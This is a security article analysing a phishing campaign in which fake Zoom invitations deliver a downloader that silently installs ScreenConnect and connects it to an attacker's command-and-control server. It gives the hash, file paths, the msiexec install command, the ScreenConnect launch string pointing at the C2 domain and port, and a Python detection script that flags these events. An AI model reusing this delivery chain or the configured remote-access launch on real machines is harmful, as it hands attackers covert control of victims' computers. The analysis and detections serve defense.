As remote work continues to proliferate in the post-pandemic world, collaboration tools like Zoom, Microsoft Teams, and WebEx have become integral to daily business operations.
However, this widespread adoption has also attracted cybercriminals, who are exploiting trust in these platforms through sophisticated phishing campaigns.
One alarming example involves fake Zoom meeting invitations that deliver malware capable of granting attackers complete remote access to the victim’s computer.
Technical Analysis: How the Attack Works
Step 1: The Lure—Fake Zoom Invitation
The attack starts with a convincing email that mimics a legitimate Zoom meeting invitation. The message typically includes a “Join” button, enticing recipients to participate in an urgent or important video call, a tactic often used to evoke a rapid, unthinking response.
Step 2: The Trap—Malicious Download
Clicking the “Join” button redirects the user to a website that, while seemingly benign, prompts the visitor to download and install the “latest Zoom client.” Instead of the genuine application, the user receives an executable file—Session.ClientSetup.exe.
File Details
- Name: Session.ClientSetup.exe
- SHA256: f5e467939f8367d084154e1fefc87203e26ec711dbfa83217308e4f2be9d58be
This file is a downloader, a lightweight program designed specifically to retrieve further malicious payloads.
Step 3: The Payload - Remote Access Trojan Deployment
Once executed, the downloader drops and installs a secondary MSI package using the built-in Windows installer service (msiexec.exe). The dropped file is:
C:\Users\admin\AppData\Local\Temp\ScreenConnect\25.2.4.9229\84cae30d9bf18843\ScreenConnect.ClientSetup.msi
It is then installed silently with:
"C:\Windows\System32\msiexec.exe" /i "C:\Users\admin\AppData\Local\Temp\ScreenConnect\25.2.4.9229\84cae30d9bf18843\ScreenConnect.ClientSetup.msi"
This package installs ScreenConnect (now known as ConnectWise Control), a legitimate remote administration tool frequently abused in cyberattacks for stealthy remote control.
Step 4: Persistence and Command & Control
After installation, the attacker configures the tool for persistence by registering it as a Windows service:
"C:\Program Files (x86)\ScreenConnect Client (84cae30d9bf18843)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=tqtw21aa.anondns.net&p=8041&s=6c9715c2-054f-49cc-b888-4084388fc1c5&..."
C2 Server:
- Domain: tqtw21aa.anondns.net
- IP: 151.242.63.139
- Port: 8041
The infected device then connects to the attacker’s Command & Control (C2) server, granting full remote access, file transfer, and system control capabilities.
Defending Against These Threats
Best Practices:
- Always verify meeting invitations and downloads—install collaboration software only from official websites.
- Educate staff about common phishing tactics that leverage urgency and fear.
- Maintain updated anti-malware solutions and enable endpoint detection and response (EDR) mechanisms.
- Monitor for unusual installations or new services, especially those referencing remote administration tools.
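The following Python script is an added example, not code from the original article, showing what the last recommendation looks like in practice. It runs two detections over constructed process-creation records shaped like the chain described in Steps 3 and 4: an msiexec.exe install of an MSI package located in a user's Temp folder, and a ScreenConnect client service launch whose relay host (the h= parameter, with p= as the port) is not on an organisation-approved list. The sample records reuse the command lines and C2 indicators quoted in this article; the APPROVED_RELAY_HOSTS set, the record format and the non-malicious records are assumptions made for the example.

```python
"""Detections for the fake-Zoom -> ScreenConnect delivery chain (added example)."""
import re
from typing import Optional
from urllib.parse import parse_qs

# Assumption: relay hosts the organisation legitimately uses for ScreenConnect.
# Any other host in a client launch string is treated as suspicious.
APPROVED_RELAY_HOSTS = {"support.example-corp.internal"}

# Constructed sample process-creation records (not real telemetry).
# Records 0 and 1 reuse the command lines quoted in the article; 2 and 3 are
# benign look-alikes added so the rules have something to ignore.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'"C:\Windows\System32\msiexec.exe" /i "C:\Users\admin\AppData\Local\Temp\ScreenConnect\25.2.4.9229\84cae30d9bf18843\ScreenConnect.ClientSetup.msi"'},
    {"image": r"C:\Program Files (x86)\ScreenConnect Client (84cae30d9bf18843)\ScreenConnect.ClientService.exe",
     "cmdline": r'"C:\Program Files (x86)\ScreenConnect Client (84cae30d9bf18843)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=tqtw21aa.anondns.net&p=8041&s=6c9715c2-054f-49cc-b888-4084388fc1c5"'},
    {"image": r"C:\Program Files (x86)\ScreenConnect Client (0000000000000000)\ScreenConnect.ClientService.exe",
     "cmdline": r'"C:\Program Files (x86)\ScreenConnect Client (0000000000000000)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=support.example-corp.internal&p=443&s=00000000-0000-0000-0000-000000000000"'},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'"C:\Windows\System32\msiexec.exe" /i "C:\ProgramData\Deploy\7zip.msi" /qn'},
]

# "/i <package>" is msiexec's install switch; capture the package path.
MSI_INSTALL_RE = re.compile(r'/i\s+"?([^"\s]+\.msi)"?', re.IGNORECASE)
# A per-user Temp directory, where a downloader typically stages its payload.
USER_TEMP_RE = re.compile(r'\\Users\\[^\\]+\\AppData\\Local\\Temp\\', re.IGNORECASE)
# The ScreenConnect client receives its configuration as one quoted "?k=v&..." argument.
SC_PARAMS_RE = re.compile(r'"(\?[^"]*)"')


def msi_from_user_temp(cmdline: str) -> Optional[str]:
    """Return the MSI path if msiexec is installing a package from a user's Temp folder."""
    m = MSI_INSTALL_RE.search(cmdline)
    if m and USER_TEMP_RE.search(m.group(1)):
        return m.group(1)
    return None


def parse_screenconnect_params(cmdline: str) -> Optional[dict]:
    """Extract the key/value pairs from a ScreenConnect client launch string."""
    m = SC_PARAMS_RE.search(cmdline)
    if not m:
        return None
    # Drop the leading '?' and keep the first value of every key.
    parsed = parse_qs(m.group(1)[1:], keep_blank_values=True)
    return {k: v[0] for k, v in parsed.items()}


def analyze_event(event: dict) -> list:
    """Apply both rules to one process-creation record and return the findings."""
    findings = []
    image = event["image"].lower()
    cmdline = event["cmdline"]

    if image.endswith("\\msiexec.exe"):
        path = msi_from_user_temp(cmdline)
        if path:
            findings.append({"rule": "msiexec-install-from-user-temp", "detail": path})

    if image.endswith("\\screenconnect.clientservice.exe"):
        params = parse_screenconnect_params(cmdline)
        if params:
            host = params.get("h", "").lower()
            if host not in APPROVED_RELAY_HOSTS:
                findings.append({
                    "rule": "screenconnect-unapproved-relay",
                    "detail": f"{host}:{params.get('p', '?')} session={params.get('s', '?')}",
                })
    return findings


def run_detections(events: list) -> list:
    """Run the rules over every record; findings keep the input order."""
    return [f for event in events for f in analyze_event(event)]


if __name__ == "__main__":
    for finding in run_detections(SAMPLE_EVENTS):
        print(f"[{finding['rule']}] {finding['detail']}")
```

Run as-is, the script reports exactly the two records taken from this article: the msiexec install staged under the admin user's Temp folder and the client service pointed at tqtw21aa.anondns.net:8041. The benign records (an approved relay host and an MSI deployed from ProgramData) produce nothing, which is the point of keeping an allowlist of relay hosts rather than alerting on every ScreenConnect launch: the tool is legitimate, the destination is what distinguishes abuse.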
In Case of Infection:
- Immediately disconnect the compromised device from the network.
- Conduct a forensic investigation to determine the extent of access or data exfiltration.
- Reset credentials and reimage affected systems if necessary.
Cybercriminals are constantly evolving their attack methods, but awareness and robust security hygiene remain our best defenses. As remote work and digital collaboration persist, so too must our vigilance against the next fake client download with real consequences.